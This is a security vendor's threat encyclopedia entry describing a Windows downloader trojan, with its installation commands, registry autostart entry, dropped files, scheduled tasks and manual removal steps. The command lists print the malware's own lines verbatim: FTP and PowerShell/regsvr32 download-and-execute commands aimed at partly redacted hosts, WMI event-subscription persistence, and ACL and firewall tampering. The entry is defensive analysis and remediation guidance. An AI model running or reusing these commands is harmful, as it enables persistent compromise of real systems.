Trojan.Win32.DLOADR.AUSUSN

December 18, 2019
 Modified by: Arianne Grace Dela Cruz
 ALIASES:

Trojan.VBS.Starter.lr (KASPERSKY); Gen:Variant.Strictor.230978 (BITDEFENDER)

 PLATFORM:

Windows

 OVERALL RISK RATING:
 DAMAGE POTENTIAL:
 DISTRIBUTION POTENTIAL:
 REPORTED INFECTION:
 INFORMATION EXPOSURE:

  • Threat Type: Trojan

  • Destructiveness: No

  • Encrypted:

  • In the wild: Yes

  OVERVIEW

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

  TECHNICAL DETAILS

File Size:

302,510 bytes

File Type:

EXE

Initial Samples Received Date:

28 Nov 2019

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Trojan adds the following processes:

  • "%System%\WScript.exe" "%Windows%\inf\n.vbs"
  • %Windows%\inf\n.vbs
  • "%Windows%\inf\c3.bat"
  • %Windows%\inf\c3.bat
  • net1 user mm123$ /del
  • net1 user admin$ /del
  • net1 user sysadm05 /del
  • net stop AnyDesk
  • sc config AnyDesk start= disabled
  • attrib -s -h -r %System Root%\Users\Default\AppData\Local\Temp\*.exe
  • attrib -s -h -r %System Root%\Users\Default\AppData\Roaming\Tempo\*.exe
  • attrib -s -h -r %System Root%\Users\Default\AppData\Roaming\*.exe
  • attrib -s -h -r %System Root%\Users\{username}\AppData\Local\Temp\*.exe
  • attrib -s -h -r %System Root%\Users\{username}\AppData\Roaming\Tempo\*.exe
  • attrib -s -h -r %System Root%\Users\{username}\AppData\Roaming\*.exe
  • attrib -s -h -r %User Temp%\*.exe
  • attrib -s -h -r %Application Data%\Tempo\*.exe
  • attrib -s -h -r %Application Data%\*.exe
  • taskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe /im wodCmdTerm.exe /im win1ogins.exe /im win1ogins.exe /im lsaus.exe /im lsars.exe /im lsacs.exe /im regedit.exe /im lsmsm.exe /im v5.exe /im anydesk.exe /im sqler.exe /im sqlservr.exe /im NsCpuCNMiner64.exe /im NsCpuCNMiner32.exe /im tlscntr.exe /im eter.exe /im lsmo.exe /im lsarr.exe /im convert.exe /im WinSCV.exe /im ctfmonc.exe /im lsmose.exe /im svhost.exe /im secscan.exe /im wuauser.exe /im splwow64.exe /im boy.exe /IM powered.EXE /im systems.exe /im acnom.exe /im regdrv.exe /im mscsuscr.exe /im Pviunc.exe /im Bllianc.exe /im st.exe /im nvidia_update.exe /im dether.exe /im buff2.exe /im a.exe /im lacas.exe
  • cacls "%System Root%\Program Files\RemoteDesk\*.exe" /e /d everyone
  • cacls "%System Root%\Program Files\RemoteDesk\*.exe" /e /d system
  • cacls "%System Root%\Program Files\Microsoft SQL Server\110\Shared\*.exe" /e /d everyone
  • cacls "%System Root%\Program Files\Microsoft SQL Server\110\Shared\*.exe" /e /d system
  • cacls "%System Root%\Program Files\autodesk\*.exe" /e /d everyone
  • cacls "%System Root%\Program Files\autodesk\*.exe" /e /d system
  • cacls "%System Root%\Program Files\anyDesk\*.exe" /e /d everyone
  • cacls "%System Root%\Program Files\anyDesk\*.exe" /e /d system
  • cacls "%Program Files%\RemoteDesk\*.exe" /e /d everyone
  • cacls "%Program Files%\RemoteDesk\*.exe" /e /d system
  • cacls "%Program Files%\Microsoft SQL Server\110\Shared\*.exe" /e /d everyone
  • cacls "%Program Files%\Microsoft SQL Server\110\Shared\*.exe" /e /d system
  • cacls "%Program Files%\autodesk\*.exe" /e /d everyone
  • cacls "%Program Files%\autodesk\*.exe" /e /d system
  • cacls "%Program Files%\anydesk\*.exe" /e /d system
  • cacls "%Program Files%\anydesk\*.exe" /e /d everyone
  • cacls %Windows%\debug\WIA\*.exe /e /d everyone
  • cacls %System Root%\Users\{username}\AppData\Roaming\Tempo\*.exe /e /d everyone
  • cacls %Application Data%\Tempo /e /d everyone
  • cacls %System Root%\Users\{username}\AppData\Roaming\Tempo\*.exe /e /d system
  • cacls %System Root%\Users\Default\AppData\Roaming\Tempo\*.exe /e /d everyone
  • cacls %Application Data%\Tempo /e /d system
  • cacls %System Root%\Users\Default\AppData\Roaming\Tempo /e /d system
  • cacls %System Root%\Users\Default\AppData\Roaming\Tempo /e /d everyone
  • cacls %System Root%\Users\Default\AppData\Roaming\Tempo\*.exe /e /d system
  • cacls %System Root%\Users\{username}\AppData\Roaming\*.exe /e /g everyone:f
  • cacls %Application Data% /e /g everyone:f
  • cacls %System Root%\Users\{username}\AppData\Local\Temp /e /g system:f
  • cacls %System Root%\Users\{username}\AppData\Local\Temp /e /g everyone:f
  • cacls %User Temp% /e /g system:f
  • cacls %User Temp% /e /g everyone:f
  • cacls %System Root%\Users\Default\AppData\Local\Temp /e /g everyone:f
  • cacls %System Root%\Users\Default\AppData\Roaming /e /g everyone:f
  • cacls %System Root%\Users\Default\AppData\Roaming /e /g system:f
  • cacls %System Root%\Users\Default\AppData\Local\Temp\*.exe /e /g everyone:f
  • cacls %System Root%\Users\Default\AppData\Roaming\*.exe /e /g everyone:f
  • cacls %System Root%\Users\Default\AppData\Roaming\*.exe /e /g system:f
  • cacls %System Root%\SysData\*.exe /e /d system
  • cacls %System Root%\Msupdate /e /d system
  • cacls %Windows%\xcecg /e /d system
  • cacls %Windows%\ccm /e /d system
  • cacls %Windows%\smss.exe /e /d system
  • cacls "%System Root%\Program Files\Common Files\Services\*.exe" /e /d system
  • cacls %System%\a.exe /e /d system
  • cacls %Windows%\security\*.exe /e /d system
  • cacls %Windows%\security\*.exe /e /d everyone
  • cacls %Windows%\Resources\*.exe /e /d system
  • cacls %Windows%\Resources\*.exe /e /d everyone
  • cacls %Windows%\Resources\Themes\*.exe /e /d system
  • cacls %Windows%\Resources\Themes\*.exe /e /d everyone
  • %System%\net1 stop AnyDesk
  • cacls %Windows%\system\lsmsm.exe /e /d system
  • cacls %All Users Profile%\homegroup\*.exe /e /d system
  • cacls %All Users Profile%\diskdata\*.exe /e /d system
  • cacls "%Program Files%\Microsoft Updates" /e /d system
  • cacls %System%\servwdrv.dll /e /d system
  • cacls %System%\servwdrv.dll /e /d everyone
  • cacls %System%\servwdrvx.dll /e /d system
  • cacls %System%\servwdrvx.dll /e /d everyone
  • cacls %System%\serwwdrv.dll /e /d system
  • cacls %System%\serwwdrv.dll /e /d everyone
  • cacls %Windows%\svchost.exe /e /d system
  • cacls %All Users Profile%\WmiAppSrv\svchost.exe /e /d system
  • cacls %Windows%\Help\taskhost.exe /e /d system
  • cacls %Windows%\Web\wininit.exe /e /d system
  • cacls %All Users Profile%\Microsoft\WmiAppSvr\csrss.exe /e /d system
  • cacls %Program Files%\Common Files\svshpst.exe /e /d system
  • cacls %Windows%\fonts\system32\svchost.exe /e /d system
  • cacls %Windows%\fonts\*.exe /e /d system
  • cacls %Windows%\Fonts\Microsoft /e /d system
  • cacls "%Windows%\Temp\32p.zip ª¦?¿ó¿¦¿¦í+???? 1\*.*" /e /d system
  • cacls "%Windows%\fonts\*.exe" /e /d system
  • cacls %Windows%\taskmgrs.exe /e /d system
  • cacls %Windows%\security\IIS\*.exe /e /d system
  • cacls %Program Files%\Common Files\System\*.exe /e /d system
  • cacls %Program Files%\dll\*.exe /e /d system
  • cacls %Windows%\Fonts\*.exe /e /d system
  • cacls %Program Files%\Common Files\Services\*.exe /e /d system
  • cacls %Program Files%\Common Files\SpeechEngines\*.exe /e /d system
  • cacls %Windows%\Fonts\system32\*.exe /e /d system
  • cacls %Windows%\SpeechsTracing\*.exe /e /d system
  • cacls "%Program Files%\Microsoft SvidiaTen\*.exe" /e /d system
  • cacLS %Program Files%\Common Files\Micros~1\*.exe /e /d system
  • cacls %System Root%\System\*.exe /e /d system
  • cacls %Windows%\1\*.exe /e /d system
  • cacls %Public%\*.exe /e /d system
  • cacls "%Program Files%\Common Files\conime.exe" /e /d system
  • cacls "%Program Files%\Common Files\conime.exe" /e /d system
  • cacls %Program Files%\test\*.exe /e /d everyone
  • cacls %Windows%\Fonts\help\*.exe /e /d system
  • cacls %Windows%\web\*.exe /e /d system
  • cacls %All Users Profile%\diskdata\*.exe /e /d system
  • cacls "%Program Files%\SQLWriter$\*.exe" /e /d system
  • cacls %Windows%\Prefetch\*.exe /e /d system
  • cacls %All Users Profile%\WmiAppSvr\*.exe /e /d system
  • cacls %Windows%\Fonts\Mysql\*.exe /e /d system
  • cacls %All Users Profile%\WmiAppSvr\*.exe /e /d system
  • cacls %Windows%\SysWOW64\drivers\taskmgr.exe /e /d system
  • cacls %Windows%\SysWOW64\drivers\svchost.exe /e /d system
  • cacls %Windows%\temp\svchost.exe /e /d system
  • cacls %Windows%\Fonts\Windows\*.exe /e /d system
  • cacls %System Root%\Msupdate /e /d system
  • cacls %Windows%\Fonts\Windows\*.exe /e /d system
  • cacls %All Users Profile%\Temp\*.exe /e /d system
  • cacls %Public%\Music\*.exe /e /d everyone
  • cacls %Public%\Music\*.vbs /e /d system
  • cacls %Windows%\Help\lsass.exe /e /d system
  • cacls %Windows%\temp\*.dll /e /d system
  • cacls %Windows%\debug\Nat\*.exe /e /d system
  • cacls %Windows%\Registration\*.exe /e /d system
  • cacls %Application Data%\Tempo\*.exe /e /d everyone
  • cacls "%Program Files%\Microsoft Blliasc\*.*" /e /d system
  • cacls "%Program Files%\Microsoft SvidiaTen\*.exe" /e /d system
  • cacls %Windows%\system\lsaus.exe /e /d system
  • cacls "%All Users Profile%\clr_optimization_v4.0.30318_64\*.exe" /e /d system
  • cacls "%All Users Profile%\Microsoft\clr_optimization_v4.0.30318_64\*.exe" /e /d system
  • cacls "%All Users Profile%\CodeGear\Microsoft Office\DataFiles\Windows\Config\Microsoft\Images\Bugger\*.exe" /e /d system
  • cacls %All Users Profile%\Microsoft\HelpLibrary\*.dll /e /d system
  • cacls %Windows%\WBEM\ccproxy\*.exe /e /d system
  • cacls %All Users Profile%\Microsoft\Network\*.exe /e /d system
  • cacls %Windows%\system\lsmsm.exe /e /d system
  • cacls %Windows%\mysql.log /e /d system
  • %System%\cmd.exe /S /D /c" echo y"
  • %System%\cmd.exe /S /D /c" rd /s /q %Windows%\help\lsmosee.exe"
  • %System%\cmd.exe /S /D /c" echo y"
  • %System%\cmd.exe /S /D /c" rd /s /q %Windows%\debug\lsmosee.exe"
  • net start MSSQLSERVER
  • %System%\net1 start MSSQLSERVER
  • schtasks /create /tn "Mysa" /tr "cmd /c echo open ftp.{BLOCKED}e.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe %Windows%\update.exe>>s&echo bye>>s&ftp -s:s&%Windows%\update.exe" /ru "system" /sc onstart /F
  • schtasks /create /tn "Mysa1" /tr "rundll32.exe %Windows%\debug\item.dat,ServiceMain aaaa" /ru "system" /sc onstart /F
  • schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.{BLOCKED}e.info>p&echo test>>p&echo 1433>>p&echo get s.dat %Windows%\debug\item.dat>>p&echo bye>>p&ftp -s:p" /ru "system" /sc onstart /F
  • schtasks /create /tn "Mysa3" /tr "cmd /c echo open ftp.{BLOCKED}e.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar %Windows%\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&%Windows%\help\lsmosee.exe" /ru "system" /sc onstart /F
  • schtasks /create /tn "ok" /tr "rundll32.exe %Windows%\debug\ok.dat,ServiceMain aaaa" /ru "system" /sc onstart /F
  • wmic process where "name='svchost.exe' and ExecutablePath<>'C:\WINDOWS\system32\svchost.exe' and ExecutablePath<>'C:\WINDOWS\syswow64\svchost.exe'" delete
  • wmic process where "name='wininit.exe' and ExecutablePath<>'C:\WINDOWS\system32\wininit.exe' and ExecutablePath<>'C:\WINDOWS\syswow64\wininit.exe'" delete
  • wmic process where "name='csrss.exe' and ExecutablePath<>'C:\WINDOWS\system32\csrss.exe' and ExecutablePath<>'C:\WINDOWS\syswow64\csrss.exe'" delete
  • wmic process where "name='WUDFHosts.exe' and ExecutablePath<>'C:\WINDOWS\system32\WUDFHosts.exe' and ExecutablePath<>'C:\WINDOWS\syswow64\WUDFHosts.exe'" delete
  • wmic process where "name='services.exe' and ExecutablePath<>'C:\WINDOWS\system32\services.exe' and ExecutablePath<>'C:\WINDOWS\syswow64\services.exe'" delete
  • wmic process where "name='taskhost.exe' and ExecutablePath<>'C:\WINDOWS\system32\taskhost.exe' and ExecutablePath<>'C:\WINDOWS\syswow64\taskhost.exe'" delete
  • wmic datafile where "Name='c:\windows\debug\lsmos.exe'" get Version /value
  • findstr "=1\.0\.0\.1$"
  • %System%\cmd.exe /c wmic process where "ExecutablePath='c:\windows\debug\lsmos.exe'" get ProcessId|findstr "[0-9]"
  • mic process where "ExecutablePath='c:\windows\debug\lsmos.exe'" get ProcessId
  • indstr "[0-9]"
  • SCHTASKS /Delete /TN "WindowsUpdate1" /F
  • SCHTASKS /Delete /TN "WindowsUpdate3" /F
  • SCHTASKS /Delete /TN "Windows_Update" /F
  • SCHTASKS /Delete /TN "Update" /F
  • SCHTASKS /Delete /TN "Update2" /F
  • SCHTASKS /Delete /TN "Update4" /F
  • SCHTASKS /Delete /TN "Update3" /F
  • SCHTASKS /Delete /TN "windowsinit" /F
  • SCHTASKS /Delete /TN "System Security Check" /F
  • SCHTASKS /Delete /TN "AdobeFlashPlayer" /F
  • SCHTASKS /Delete /TN "updat_windows" /F
  • SCHTASKS /Delete /TN "at1" /F
  • SCHTASKS /Delete /TN "at2" /F
  • SCHTASKS /Delete /TN "Microsoft LocalManager[Windows Server 2008 R2 Enterprise]" /F
  • SCHTASKS /DELETE /TN "\Microsoft\Windows\UPnP\Services" /f
  • SCHTASKS /Delete /TN "Microsoft LocalManager[Windows Server 2008 R2 Standard]" /F
  • netsh ipsec static delete policy name=win
  • netsh ipsec static delete filterlist name=Allowlist
  • netsh ipsec static delete filterlist name=denylist
  • netsh ipsec static delete filteraction name=allow
  • netsh advfirewall firewall delete rule name="tcp all" dir=in
  • netsh advfirewall firewall delete rule name="deny tcp 445" dir=in
  • netsh advfirewall firewall delete rule name="deny tcp 139" dir=in
  • netsh advfirewall firewall delete rule name="tcpall" dir=out
  • sc config MpsSvc start= auto
  • net start MpsSvc
  • %System%\net1 start MpsSvc
  • netsh advfirewall set allprofiles state on
  • netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
  • netsh advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block
  • netsh advfirewall firewall add rule name="deny tcp 139" dir=in protocol=tcp localport=139 action=block
  • netsh advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow
  • netsh ipsec static add policy name=win
  • netsh ipsec static add filterlist name=Allowlist
  • netsh ipsec static add filterlist name=denylist
  • netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
  • netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
  • netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
  • netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
  • netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
  • netsh ipsec static add filteraction name=Allow action=permit
  • netsh ipsec static add filteraction name=deny action=block
  • netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
  • netsh ipsec static set policy name=win assign=y
  • %System%\cmd.exe /S /D /c" ver "
  • find "5.1."
  • wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm2_filter" DELETE
  • wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm2_consumer" DELETE
  • wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="Windows Events Filter" DELETE
  • wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="Windows Events Consumer4" DELETE
  • wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="Windows Events Consumer" DELETE
  • wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='Windows Events Filter'" DELETE
  • wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="fuckayoumm3" DELETE
  • wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE
  • wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE
  • wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE
  • wmic /NAMESPACE:"\root\subscription" PATH __EventFilter CREATE Name="fuckamm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
  • wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckamm4", CommandLineTemplate="cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.{BLOCKED}e.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://{BLOCKED}.{BLOCKED}.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://{BLOCKED}.{BLOCKED}.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://{BLOCKED}.{BLOCKED}.158.117:8117/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://{BLOCKED}.{BLOCKED}.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://{BLOCKED}.{BLOCKED}.250.162:8162/power.txt')||regsvr32 /u /s /i:http://{BLOCKED}.{BLOCKED}.158.117:8117/s.txt scrobj.dll®svr32 /u /s /i:http://{BLOCKED}.{BLOCKED}.250.161:8161/s.txt scrobj.dll®svr32 /u /s /i:http://{BLOCKED}.{BLOCKED}.155.170:8170/s.txt scrobj.dll®svr32 /u /s /i:http://{BLOCKED}.{BLOCKED}.160.237:8237/s.txt scrobj.dll®svr32 /u /s /i:http://{BLOCKED}.{BLOCKED}.250.162:8162/s.txt scrobj.dll®svr32 /u /s /i:http://wmi.{BLOCKED}e.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:\"http://{BLOCKED}.{BLOCKED}.155.170:8170/s.xsl\""
  • cmd /c start wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"fuckamm3\"", Consumer="CommandLineEventConsumer.Name=\"fuckamm4\""
  • wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"fuckamm3\"", Consumer="CommandLineEventConsumer.Name=\"fuckamm4\""

Autostart Technique

This Trojan adds the following registry entries to enable its automatic execution at every system startup:

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Run
start = "regsvr32 /u /s /i:http://js.{BLOCKED}e.info:280/v.sct scrobj.dll" /f

Other System Modifications

This Trojan adds the following registry keys:

HKEY_CURRENT_USER\Software\WinRAR SFX

It adds the following registry entries:

HKEY_CURRENT_USER\Software\WinRAR SFX
C%%Windows%inf = "%Windows%\inf"

Dropping Routine

This Trojan drops the following files:

  • %Windows%\inf\c3.bat
  • %Windows%\inf\n.vbs
  • %Windows%\inf\_tmp_rar_sfx_access_check_3196273

(Note: %Windows% is the Windows folder, where it usually is C:\Windows on all Windows operating system versions.)

Other Details

This Trojan adds the following scheduled tasks:

  • Task Name: Mysa
      Trigger: onstart
      Action: "cmd /c echo open ftp.{BLOCKED}e.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe %Windows%\update.exe>>s&echo bye>>s&ftp -s:s&%Windows%\update.exe"
  • Task Name: Mysa1
      Trigger: onstart
      Action: "rundll32.exe %Windows%\debug\item.dat,ServiceMain aaaa"
  • Task Name: Mysa2
      Trigger: onstart
      Action: "cmd /c echo open ftp.{BLOCKED}e.info>p&echo test>>p&echo 1433>>p&echo get s.dat %Windows%\debug\item.dat>>p&echo bye>>p&ftp -s:p"
  • Task Name: Mysa3
      Trigger: onstart
      Action: "cmd /c echo open ftp.{BLOCKED}e.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar %Windows%\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&%Windows%\help\lsmosee.exe"
  • Task Name: ok
      Trigger: onstart
      Action: "rundll32.exe %Windows%\debug\ok.dat,ServiceMain aaaa

  SOLUTION

Minimum Scan Engine:

9.850

FIRST VSAPI PATTERN FILE:

15.526.04

FIRST VSAPI PATTERN DATE:

28 Nov 2019

VSAPI OPR PATTERN File:

15.527.00

VSAPI OPR PATTERN Date:

29 Nov 2019

Step 1

Trend Micro Predictive Machine Learning detects and blocks malware at the first sign of its existence, before it executes on your system. When enabled, your Trend Micro product detects this malware under the following machine learning name:

    TROJ.Win32.TRX.XXPE50FFF033E0002

Step 2

Before doing any scans, Windows 7, Windows 8, Windows 8.1, and Windows 10 users must disable System Restore to allow full scanning of their computers.

Step 3

Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.

Step 4

Restart in Safe Mode

[ Learn More ]

Step 5

Delete this registry key

[ Learn More ]

Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this step only if you know how or you can ask assistance from your system administrator. Else, check this Microsoft article first before modifying your computer's registry.

  • In HKEY_CURRENT_USER\Software
    • WinRAR SFX

Step 6

Delete this registry value

[ Learn More ]

Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this step only if you know how or you can ask assistance from your system administrator. Else, check this Microsoft article first before modifying your computer's registry.

  • In HKEY_CURRENT_USER\Software\WinRAR SFX
    • C%%Windows%inf = "%Windows%\inf"
  • In HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    • start = "regsvr32 /u /s /i:http://js.{BLOCKED}e.info:280/v.sct scrobj.dll" /f

Step 7

Search and delete these components

[ Learn More ]
There may be some components that are hidden. Please make sure you check the Search Hidden Files and Folders checkbox in the "More advanced options" option to include all hidden files and folders in the search result.
  • %Windows%\inf\c3.bat
  • %Windows%\inf\n.vbs
  • %Windows%\inf\_tmp_rar_sfx_access_check_3196273

Step 8

Deleting Scheduled Tasks

The following {Task Name} - {Task to be run} listed should be used in the steps identified below:

  • Task Name: Mysa
  • Task to be run: "cmd /c echo open ftp.{BLOCKED}e.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe %Windows%\update.exe>>s&echo bye>>s&ftp -s:s&%Windows%\update.exe"
  • Task Name: Mysa1
  • Task to be run: "rundll32.exe %Windows%\debug\item.dat,ServiceMain aaaa"
  • Task Name: Mysa2
  • Task to be run: "cmd /c echo open ftp.{BLOCKED}e.info>p&echo test>>p&echo 1433>>p&echo get s.dat %Windows%\debug\item.dat>>p&echo bye>>p&ftp -s:p"
  • Task Name: Mysa3
  • Task to be run: "cmd /c echo open ftp.{BLOCKED}e.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar %Windows%\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&%Windows%\help\lsmosee.exe"
  • Task Name: ok
  • Task to be run: "rundll32.exe %Windows%\debug\ok.dat,ServiceMain aaaa

For Windows 2000, Windows XP, and Windows Server 2003:

  1. Open the Windows Scheduled Tasks. Click Start>Programs>Accessories>
    System Tools>Scheduled Tasks.
  2. Locate each {Task Name} values listed above in the Name column.
  3. Right-click on the said file(s) with the aforementioned value.
  4. Click on Properties. In the Run field, check for the listed {Task to be run}.
  5. If the strings match the list above, delete the task.

For Windows Vista, Windows 7, Windows Server 2008, Windows 8, Windows 8.1, and Windows Server 2012:

  1. Open the Windows Task Scheduler. To do this:
    • On Windows Vista, Windows 7, and Windows Server 2008, click Start, type taskschd.msc in the Search input field, then press Enter.
    • On Windows 8, Windows 8.1, and Windows Server 2012, right-click on the lower left corner of the screen, click Run, type taskschd.msc, then press Enter.
  2. In the left panel, click Task Scheduler Library.
  3. In the upper-middle panel, locate each {Task Name} values listed above in the Name column.
  4. In the lower-middle panel, click the Actions tab. In the Details column, check for the {Task to be run} string.
  5. If the said string is found, delete the task.

Step 9

Restart in normal mode and scan your computer with your Trend Micro product for files detected as Trojan.Win32.DLOADR.AUSUSN. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information.


Did this description help? Tell us how we did.